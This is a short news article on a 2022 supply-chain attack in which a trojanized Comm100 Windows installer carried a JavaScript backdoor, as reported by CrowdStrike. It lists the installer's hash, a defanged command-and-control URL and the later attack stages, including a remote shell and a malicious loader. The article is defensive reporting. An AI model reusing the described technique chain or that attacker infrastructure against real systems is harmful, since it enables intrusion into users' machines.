Researchers discovered a sophisticated supply-chain attack on chat service provider Comm100 that affected numerous companies. The attackers hacked the Comm100 desktop client to roll out a trojanized installer. While Comm100 has released a clean version, users must ensure they update their systems with the fixed installer version 10.0.9 to avoid any issues.
Comm100 Chat Service Supple-Chain Attack
According to a recent report from CrowdStrike, some Chinese threat actors have allegedly hacked the Comm100 chat service in a supply-chain attack.
Comm100 is a customer service and communication SaaS platform facilitating numerous businesses. Given the crucial chat functionalities that Comm100 offers, any cybersecurity threat affecting this tool can directly impact client businesses.
As their intelligence teams observed, the attack happened from September 27, 2022, through the morning of September 29, 2022. And during this time, the malicious installer infected numerous businesses in the healthcare, industrial, insurance, manufacturing, technology, and telecommunication sectors in Europe and North America.
CrowdStrike researchers noticed that the threat actors seemingly hijacked an otherwise legit installer for Comm100 desktop for Windows client. The infected installer was then made available for download from the actual company website. Thus, it attempted to escape detection as no one would ever suspect software downloaded from legit websites.
The malicious installer had a JavaScript backdoor that would download and execute second-stage malware. As stated in their post,
This installer (SHA256 hash: ac5c0823d623a7999f0db345611084e0a494770c3d6dd5feeba4199deee82b86) is an Electron application that contains a JavaScript (JS) backdoor within the file main.js of the embedded Asar archive.
The backdoor downloads and executes a second-stage script from URL http[:]//api.amazonawsreplay[.]com/livehelp/collect.
The second-stage script then communicates with the C&C, has a backdoor that collects the device data, and provides remote shell functionality to the attackers.
Once established, the malware then abuses the legit Microsoft Metadata Merge Utility (mdmerge.exe) binary to install more malicious files. One such file, the MidlrtMd.dll malicious loader, then decrypts the payload, which further injects another payload. The attackers’ intended malicious activities then go on without raising suspicion.
Comm100 Released A Clean Installer
CrowdStrike has confirmed that Comm100 has released a clean installer on their website, version 10.0.9. So now, users should rush to get this new installer and get rid of any previously installed versions.
For now, it’s unclear if the attack has damaged the operations of any other client businesses. As for the attackers’ identity, CrowdStrike suspects them to be the same that have recently run another malicious campaign targeting online gambling sites.
Let us know your thoughts in the comments.